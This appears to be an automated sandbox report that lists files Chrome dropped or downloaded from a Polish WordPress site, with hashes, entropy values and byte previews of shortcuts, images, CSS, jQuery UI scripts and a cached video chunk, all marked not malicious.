                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 09:07:51 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2673
                                                            Entropy (8bit):3.9813177765516965
                                                            Encrypted:false
                                                            SSDEEP:48:8mdzT7/MH4idAKZdA1FehwiZUklqehZy+3:8aP7Oy
                                                            MD5:99370AB276F722D3B6811134569481C6
                                                            SHA1:34E0A9AE800EBC093119FA8B4185F65C22C570D7
                                                            SHA-256:D2B27F77CF966CB3430DF1ACC18B1A7743B128E6D2500D23D6705E0FAE5F5DF7
                                                            SHA-512:D8B75C1CC5E40BF35998AFCE4469CA9B981945FDB0243436A9BAA9DD11C0F54D76BD3B1185B53C9487AF7782772B483A6D77BA178A6D38E11731C979161DAE9D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....g.8V5g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 09:07:51 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2675
                                                            Entropy (8bit):3.997392980836856
                                                            Encrypted:false
                                                            SSDEEP:48:8fldzT7/MH4idAKZdA1seh/iZUkAQkqeh+y+2:8fLPl9Q3y
                                                            MD5:AF41FC19318CCC73580026EC762C26F2
                                                            SHA1:AC3AD5A45923FD4B0CB0F2257A2E0FAE71C9A145
                                                            SHA-256:5D59BCF21293FD81E61D6FEB732D177B350C945E1D116C7AAEDE1DE1B9C63D6C
                                                            SHA-512:BA4239A51FF2C71771CD12762B56FAA7723E37FAB0B129EBD4F5DC7870D1F3E0F76FFD88F392EE77BA127F6FDA818F9CFBC12CCC8B2371A56BAE6D22B6A9097B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,.....G.V5g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2689
                                                            Entropy (8bit):4.009928721833189
                                                            Encrypted:false
                                                            SSDEEP:48:8YdzT7/AH4idAKZdA14meh7sFiZUkmgqeh7ssy+BX:80P9nSy
                                                            MD5:58BDE3ABD33106BC319675CAA3CF6DEA
                                                            SHA1:31F367707B788F993CC85ADFEFDD2D164AD01573
                                                            SHA-256:29DFF9AD524E9F110631EDB1797B655D025FC4CB909AEB3E621DED21C9B20968
                                                            SHA-512:601D507EFF61E61BD05A280C69CD7AFC6794754A10063AE3E930DD620828E35CF719B51E6C7B95C621E8224AFB5F0A8641C68D84D80643282A89BDB28C101766
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 09:07:51 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.996213488542688
                                                            Encrypted:false
                                                            SSDEEP:48:8SdzT7/MH4idAKZdA1TehDiZUkwqehKy+R:8eP2Ey
                                                            MD5:3FED6CBD16D5F2F2568565599E52F7F9
                                                            SHA1:FA9B81D8401487EAE5BCCF52FD751A56C2BBA65D
                                                            SHA-256:FF9B8C5B8F483330A3665B80BE31027DF7CA7F27D0D4A371D9904699142744B2
                                                            SHA-512:E0226835DCE9662055065C2500160E57BE17802C018BA04EEB21EA870320295DC172B9D608C8BE334834345967A35337449735338EA155C944BACC31745DC6DA
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....#e)V5g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 09:07:51 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.9855197985887107
                                                            Encrypted:false
                                                            SSDEEP:48:8qdzT7/MH4idAKZdA1dehBiZUk1W1qehgy+C:8WP29Ay
                                                            MD5:11F32B0A245C89EB7F0CDA4D1408441C
                                                            SHA1:4C3BE981526BEE8979878A4BC559B7670D49396F
                                                            SHA-256:4E2FAB92EFE36BA84D497C9105D6798F4FD8A9666C858520878EE8C20E8CA146
                                                            SHA-512:A10B5F1D95D11865362733A593373602308730318F658384E5FF51E397F5A06B82BEF9812D0BE1F1FF6BB9DFE6F7F28407A87E656BA93581F54944D71B235089
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....4.3V5g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 09:07:51 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2679
                                                            Entropy (8bit):3.99409195815048
                                                            Encrypted:false
                                                            SSDEEP:48:88MdzT7/MH4idAKZdA1duTeehOuTbbiZUk5OjqehOuTbSy+yT+:8NPMTfTbxWOvTbSy7T
                                                            MD5:3CE9B86D866DBD81863FEF8B3277E3E1
                                                            SHA1:0131C6EADBD01696AB6BF4C324B47ACAA259594B
                                                            SHA-256:15AF9B061D9B9D3D1A183FC26900892368D5E721C485319AECB265BC0CF36D64
                                                            SHA-512:16F1C86A000467E249556A7017E3C14A45FD867A54DB99179D628F51205D60039E299F0DD39009055CB5E5EAA41A3790A66F19F616FF3DD194951F5785585131
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....q. V5g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):26134
                                                            Entropy (8bit):7.972341752081497
                                                            Encrypted:false
                                                            SSDEEP:768:ZcB9j81DGCU9yM1c9h9Zv+bAjZengHkIr+r1UYh:Zj1DfrjZv+pngHdr9w
                                                            MD5:C936F3654069E8767EB26BDE36B9B4F3
                                                            SHA1:32561511CAF7FF1AF2BB8575C1178424DFA83B4F
                                                            SHA-256:D453342FD600DE3570DB04926400900B623726E7C7856E722B69EFF3046A876D
                                                            SHA-512:135E6634638D4E4876F82AC3C6A20DFD94893F62BC66A9FBC6716ECC81146213DDA9FAC9064CA94FD4323ECBB3DA09B4DA80EDF4ADEA2852F7ADC59782B3D94B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_cars.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....:....... .IDATx..y.\.u.....Ts...s.ZRKB..B .....6......u........g.&...NVV.o...$.6...1...d.#$$...Bck.V...s......F..c&.s>Z..n..:.......................................................................................................................................................................................D`.7...Y,..hff..lvE.\Nz...,.....m..x<~...ak8..G!..X&...4.........x.:.^......b1......Ho.*...r.\.G6.%..RWWw......x...!..J.`...jff.....~7..G...hll.......4.t.\.W....VCC.......m.....?<y..................%...,Z.........`...*t..G}.....E8......b....0.i>.h.w.!J.U..z+..PJ..8p.........(.....`lllf.U[..G..:.J Xo..2......:...+VD..*`..:t.Pa......o.B..U.....U.P..c....+. W.p>.J.C...K....H.h...k..}._..3.<.f.P V./%Z...+n..r.0...a X...J..wx...h4..$.%....>|8.q...!D&..C.&x.b.:r.....X..R..(...#G.<..........+sjj.O|.......$..............6.....f.V..........#.W.......^k......!V.3g....!.....&
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):22580
                                                            Entropy (8bit):7.984837615415022
                                                            Encrypted:false
                                                            SSDEEP:384:I/+6j1s+9ZsN56k9BJxgwTDZgwdy+4woln5Sl4Yjx/AEU04OpVl8HNVY38f:TqvsN5TrJxgwTNguyNn5SlnAEUVskHNb
                                                            MD5:B4214014B00F2EA0EA2607C8B5E63F2B
                                                            SHA1:95377E6A0C8637198192C5793A04A717EB2F52B3
                                                            SHA-256:DB073AA256AB1BA11B0A852CD30600A9E1B5BAB8E7A7122908EA444D9FEF54DE
                                                            SHA-512:65D09BE88A402086FB948BC2C2C0BAC125B22F3986DB73CC1F5A1CC1B29C3D27B1D1E49B72B9D0F462CB7BB9DD428636BAF127486D5DCB6470E8C907A5D17580
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/pepco_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..].`....ff.f7=.B..w. >..*.<,.`.....{v...x..^PTT.QPQ)?U....@Bz.l......!$........;g.|....SU...]..h..a...a.m...;....HOl.a.k.O...w...e.V..>|...;.9.......a....5.0....<.v8"<Q._AG@.((....{c.....T....A...udX...T....B.iU..e..)..w.A.`....>...dP.w.;H..@}r....."V..3L....8..._@. !.^.p#.`!.g....~..#.0Q.w.......&.BFu...:.(x....a>.8.?.....D..<.J.........Q~.u..l...T.R.F..aO....3J...ey........."v.S...<...!.."l=j.:....c.Z{...V...1.<...z|)e...]..:.>.-.i.../..Q.dX...r.D(.....6.......;N..+...p....*...+..e....W.U...z:l2.s.n..".93.`..a.+'....~...;<..h@......a.W......."..(8..&Grn..Q..O<Q|.u.u..........`.!m...;...t:O.ey...A..T..k.....s...5...02..N.kg.Zw.....j..tD..El..E..J...0.....Z.`.....a...Q....U.R.5.".aa.....k.V...?=.s[.xr..p.Ai..cU.~...***R;u.t06q.A....Q..?(cZ...b.........='"......D.xs.....5I>..Q...T....v.4tJ...Bl.ey.P.d...."..#2.UF.`).~u?z.......cw#.I..../.(wA.k.=.S..Gn...U..i..~..KE...,`!...G...#..Q;
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):108214
                                                            Entropy (8bit):5.135513699149497
                                                            Encrypted:false
                                                            SSDEEP:3072:3T4OHBEp/aFXhu5KXW2VhRCKB/RXRpzx22K9Y:3T4OHBEp/aFXhu5KXW2VhRCKB/RXRpzJ
                                                            MD5:EEF7A53CF5FF3FF474D5397B99D90D85
                                                            SHA1:F5875592C8F098C386A613699874BC94A61AF73F
                                                            SHA-256:12249348FF20AB2E65CE54F3A6E4ED3ECC9242B8B04E70055AE9E139DA9A95FC
                                                            SHA-512:E0B9F4F51EC9614C10F603BB70BE096EB8F4071489F3A13A0DC6DB24C4ACBFD1C12120AB5DA4D63EB20471EA24C245884A48E01181A0661D1030442924F6A1FE
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=4.12.1
                                                            Preview:.thumbnail > img,..thumbnail a > img,..carousel-inner > .item > img,..carousel-inner > .item > a > img {. display: block;. max-width: 100%;. height: auto;.}..btn-group-lg > .btn {. padding: 10px 16px;. font-size: 18px;. line-height: 1.33;. border-radius: 6px;.}..btn-group-sm > .btn {. padding: 5px 10px;. font-size: 12px;. line-height: 1.5;. border-radius: 3px;.}..btn-group-xs > .btn {. padding: 1px 5px;. font-size: 12px;. line-height: 1.5;. border-radius: 3px;.}..dl-horizontal dd:before,..dl-horizontal dd:after,..container:before,..container:after,..container-fluid:before,..container-fluid:after,..row:before,..row:after,..form-horizontal .form-group:before,..form-horizontal .form-group:after,..btn-toolbar:before,..btn-toolbar:after,..btn-group-vertical > .btn-group:before,..btn-group-vertical > .btn-group:after,..nav:before,..nav:after,..navbar:before,..navbar:after,..navbar-header:before,..navbar-header:after,..navbar-collapse:before,..navbar-collapse:after,..pager:befo
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):1048576
                                                            Entropy (8bit):7.999796387355648
                                                            Encrypted:true
                                                            SSDEEP:24576:TGGt5vS5o6v58Da4A5hEfn5tcrY/+RsjhX9/BGssD0RekX:PUfSDa0T2Y/WsvfW03
                                                            MD5:E90BECA8F3F5845FFF02CF35078F49DD
                                                            SHA1:416D8140D76527444ED99ACC9B567213A7FE33A4
                                                            SHA-256:6397613765F148701BD3DAFBFEE67AD0EC2D7736B92216C09F2D49403845CDB3
                                                            SHA-512:B267EEF16F1424499D6852404A3B18BC744D0835A39A6EBD56ECCF478606DAE175F9539FCB4A74044AA8FE11E754C40535F5488B395A858C266B46CFE6FFE7BA
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:4
                                                            Preview:...a./.....F.#.."1.f.~....,.tDr.G..Jc`K@A.%.J.H..T....].....x.>.P...Md...r.2.s...A...b..N0y......*,.,C..L...il)..Pp<=...F<=$.r.._\&..5....X......&..Y..h.K|..}...o.....XG.H3.F.?.g.Mw.^..p.c.v%..._G.G.cA!..[.v.xTd..q.N*...3. .....*!........o7....L.....c.oS...#.y...t=^7...'T#......B..O..-.#.........53ZL.i.-&.A._)(..h_E......h...4..{..E............(b.0\.J...V..[..V8...s...._.6,N..[......8.oC.....phL7!HO+...M...m.0R."W],..<.OT....O..a-..UqSO..o.'z.."%.iH8..<....C.....1..T..\z...a.3..+3...|I..!...,....P`...}.j..y....h.N.M..c.^.U...VpjA...RZ....I.....O#!...)...d..b&<M..`vJv.X.o.A..J7g.9..DQ/..:7d.......S(.K7.._.."...ib..OW..8..."v%...<z4...t.m.....}7e...|.l..-pH.T.T....;.Y..&.s..G....g..(.@.......5.M... ..4.3.h>:|7/J..Q....U.1tu.>tk...+..huw<...`.09..aa...:Gd....}e.x.".._.....L..e....R.lnh.1<.l......Xbt.h.......l..7........X........h....l....._3..!.jG..h.7.~......O..a.-$.yd.i/W.$}..l.......\....J..(.V..NT.P.h./j....:4....m..VHDw.%.h..F.......A..t.Z
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1222)
                                                            Category:dropped
                                                            Size (bytes):1257
                                                            Entropy (8bit):5.043558411227901
                                                            Encrypted:false
                                                            SSDEEP:24:Q775J7w/Wbiz7vBmGa1RIYTu9cwMY3l0SSCzfIZ7kJ7UBmGH7vKdpx3:Q7z1euMY69cQiSd07kJkidpp
                                                            MD5:E904F89B2191B14EEEB44A9C419E8676
                                                            SHA1:B125EB8E81AB1502F980EE6AE76DFC8CD5C9D6B4
                                                            SHA-256:E127AEAD57CD6625F795F8C41D8B7C463C2C50158E3A3DC398424DB2B16BD5DB
                                                            SHA-512:993A889AB299C8E0E846BCFB690813E1A1DD4453E218D7239DBC1C680DFCC40E687D6E1C27CF8C437E3752961F93777C1B36BFD23531E9CFC808FC7335893805
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.domReady=function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)n.d(r,o,function(t){return e[t]}.bind(null,o));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s="2oG7")}({"2oG7
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (9354)
                                                            Category:downloaded
                                                            Size (bytes):9531
                                                            Entropy (8bit):5.016514932736511
                                                            Encrypted:false
                                                            SSDEEP:192:F+VgksRTuuE2mBrcPgfMGFTsPWl7h12JyF:F1duuE7xhxsPS0A
                                                            MD5:65941CBC22665FE5913213A865679E12
                                                            SHA1:8BB14561F9AF47C0B965D0216B9C4DDC39DA9FF0
                                                            SHA-256:E94B12CB948D3D2EFF43ADDF04700F8611BA383C00892652DC294A76BEC2A105
                                                            SHA-512:C5DEB96E36CE773C5B3BFAB85A1D8D1A4DC1FB43B9A5767E29A2B12D1EC80F3CF2E652D7C4B1BBCDECD0A7E76F578541C5BB07B1995DB4F835258A60DB494391
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/jquery/ui/menu.min.js?ver=1.12.1
                                                            Preview:/*!. * jQuery UI Menu 1.12.1. * http://jqueryui.com. *. * Copyright jQuery Foundation and other contributors. * Released under the MIT license.. * http://jquery.org/license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery","./core"],e):e(jQuery)}(function(a){return a.widget("ui.menu",{version:"1.12.1",defaultElement:"<ul>",delay:300,options:{icons:{submenu:"ui-icon-caret-1-e"},items:"> *",menus:"ul",position:{my:"left top",at:"right top"},role:"menu",blur:null,focus:null,select:null},_create:function(){this.activeMenu=this.element,this.mouseHandled=!1,this.element.uniqueId().attr({role:this.options.role,tabIndex:0}),this._addClass("ui-menu","ui-widget ui-widget-content"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault()},"click .ui-menu-item":function(e){var t=a(e.target),i=a(a.ui.safeActiveElement(this.document[0]));!this.mouseHandled&&t.not(".ui-state-disabled").length&&(this.select(e),e.isPropagationStopped()||(this.mouseHandled=!0),t.has(".ui-
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:34:24], baseline, precision 8, 553x500, components 3
                                                            Category:dropped
                                                            Size (bytes):44937
                                                            Entropy (8bit):7.58989318705918
                                                            Encrypted:false
                                                            SSDEEP:768:uJ5DcYyVwnZUgmYpXW98gb3RvmE0qenhhdyYLaNowY2bxQ2tUW:uJ1cUUgmX8gdeEhehhdtLa/pv5
                                                            MD5:E9CE8C1AE16ADE47DC3B8BEF0DEDE230
                                                            SHA1:D034E930FDD175BABE820BCE7DC5D5221416E5EA
                                                            SHA-256:11FEF894DAF3323C0CEFB534207A56BF4F26A0AE8FEF2B9B4688154ADB8F6031
                                                            SHA-512:626F164B0FF18ABEA85304C40E7E2D25D7FB209887139CBEF022BF306025C97BEF5A5D67E6BF877A0ECEAC58577D31858813F3BE7899A13E37514F4C7A3CBC9F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF..............Exif..MM.*.............................b...........j.(...........1.........r.2...........i..............................Adobe Photoshop 7.0 CE.2018:07:26 14:34:24.............................).......................................................".(.....................*......................................JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................w...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..I.T.m.S.. 4.........;w?.t...$.....}..8.!5..z..f.;..>j.. ..?4.Em2....B\9.'...RE$..T.....p..N.yA.. .QXBIID...LS.I......6{b..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 350x350, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=15, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=267, yresolution=275, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 12:43:06], progressive, precision 8, 436x401, components 3
                                                            Category:dropped
                                                            Size (bytes):89958
                                                            Entropy (8bit):7.794304156655165
                                                            Encrypted:false
                                                            SSDEEP:1536:Ey+9+J/SAlph8DBpMKfHRF8sPLZsHh+EoJdpbd9hCR3RMooK1NPHVH:Eyi2bpIpVfD8slmh+/J3bd7CBRMJK1ZF
                                                            MD5:FB955AE85B5EE0A2D6D5D299B94E5781
                                                            SHA1:7D0543A4CF2C6F84003FF7121A7DE472205EE2AA
                                                            SHA-256:14D15516E4D15A66DFFBBDF144320ECCD45978B37927B2CAFFFEC0BC0A7C524C
                                                            SHA-512:5A666B94135BF4E3F2D3C8E3AADF1BD69349BBEC95BC18189F7A68BA30EE35CB2675004090FC7BD1E495FCD379E5D72218BA99E2B9BE61AD29E24025E1CD08D1
                                                            Malicious:false
                                                            Reputation:low
